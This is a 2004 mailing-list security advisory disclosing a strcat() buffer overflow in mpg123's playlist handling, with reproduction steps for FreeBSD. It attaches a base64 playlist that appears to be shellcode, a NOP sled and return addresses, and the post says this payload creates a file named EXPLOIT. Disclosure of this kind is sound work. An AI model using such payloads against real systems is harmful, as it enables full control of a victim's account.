Mailing-List: contact securesoftware-help@list.cr.yp.to; run by ezmlm
Delivered-To: mailing list securesoftware@list.cr.yp.to
Received: (qmail 16826 invoked by uid 1017); 15 Dec 2004 08:14:59 -0000
Date: 15 Dec 2004 08:14:59 -0000
Message-ID: <20041215081459.16825.qmail@cr.yp.to>
Mail-Followup-To: securesoftware@list.cr.yp.to,
  hippm@informatik.uni-tuebingen.de
Automatic-Legal-Notices: See http://cr.yp.to/mailcopyright.html.
From: "D. J. Bernstein" <djb@cr.yp.to>
To: securesoftware@list.cr.yp.to, hippm@informatik.uni-tuebingen.de
Subject: [remote] [control] mpg123 0.59r find_next_file overflows linetmp buffer
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="qMm9M+Fa2AknHoGS"
Content-Disposition: inline


--qMm9M+Fa2AknHoGS
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

Bartlomiej Sieka, a student in my Fall 2004 UNIX Security Holes course,
has discovered a remotely exploitable security hole in mpg123. I'm
publishing this notice, but all the discovery credits should be assigned
to Sieka.

You are at risk if you use mpg123 --list to take an MP3 playlist from a
web page (or any other source that could be controlled by an attacker).
Whoever provides that input then has complete control over your account:
he can read and modify your files, watch the programs you're running,
etc.

Of course, when you accept a playlist from someone else, you are running
the risk that the playlist will include some of your files, conceivably
secret audio files. But the mpg123 documentation does not suggest that
there is any larger risk.

Proof of concept: On an x86 computer running FreeBSD 4.10, as root, type

   cd /usr/ports/audio/mpg123
   make install

to download and compile the mpg123 program, version 0.59r (current ports
version; note that pre0.59s does not appear to have fixed the bug).
Then, as any user, save the file 8.list attached to this message, and
type

   mkdir 1234567890123456789
   mv 8.list 1234567890123456789/8.list
   mpg123 -s --list 1234567890123456789/8.list >/dev/null

with the unauthorized result that a file named EXPLOIT is created in the
current directory. (I tested this with a 4621-byte environment, as
reported by printenv | wc -c.)

Here's the bug: In playlist.c, find_next_file() uses strcat() to copy
any amount of data into a 1024-byte linetmp[] array.

---D. J. Bernstein, Associate Professor, Department of Mathematics,
Statistics, and Computer Science, University of Illinois at Chicago

--qMm9M+Fa2AknHoGS
Content-Type: application/octet-stream
Content-Disposition: attachment; filename="8.list"
Content-Transfer-Encoding: base64

kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJDrKFkx
wIhBB0BAQMHgB1C4EjRWAsHoGMHgCFBRMcCwBVDNgDHAUEBQzYDo0////0VYUExPSVQE5r+/
BOa/vwTmv78E5r+/BOa/vwTmv78E5r+/BOa/vwTmv78E5r+/BOa/vwTmv78E5r+/BOa/vwTm
v78E5r+/BOa/vwTmv78E5r+/BOa/vwTmv78E5r+/BOa/vwTmv78E5r+/BOa/vwTmv78E5r+/
BOa/vwTmv78E5r+/BOa/vwTmv78E5r+/BOa/vwTmv78E5r+/BOa/vwTmv78E5r+/BOa/vwTm
v78E5r+/BOa/vwTmv78E5r+/BOa/vwTmv78E5r+/BOa/vwTmv78E5r+/BOa/vwTmv78E5r+/
BOa/vwTmv78E5r+/BOa/vwTmv78E5r+/BOa/vwTmv78E5r+/BOa/vwTmv78E5r+/BOa/vwTm
v78E5r+/BOa/vwTmv78E5r+/BOa/vwTmv78E5r+/BOa/vwTmv78E5r+/BOa/vwTmv78E5r+/
BOa/vwTmv78E5r+/BOa/vwTmv78E5r+/BOa/vwTmv78E5r+/BOa/vwTmv78E5r+/BOa/vwTm
v78E5r+/BOa/vwTmv78E5r+/BOa/vwTmv78E5r+/BOa/vwTmv78E5r+/BOa/vwTmv78E5r+/
BOa/vwTmv78E5r+/BOa/vwTmv78E5r+/BOa/vwTmv78E5r+/BOa/vwTmv78E5r+/BOa/vwTm
v78E5r+/BOa/vwTmv78E5r+/BOa/vwTmv78E5r+/BOa/vwTmv78E5r+/BOa/vwTmv78E5r+/
BOa/vwTmv78E5r+/BOa/vwTmv78E5r+/BOa/vwTmv78E5r+/BOa/vwTmv78E5r+/BOa/vwTm
v78E5r+/BOa/vwTmv78E5r+/BOa/vwTmv78E5r+/BOa/vwTmv78E5r+/BOa/vwTmv78E5r+/
BOa/vwTmv78E5r+/BOa/vwTmv78E5r+/BOa/vwTmv78E5r+/BOa/vwTmv78E5r+/

--qMm9M+Fa2AknHoGS--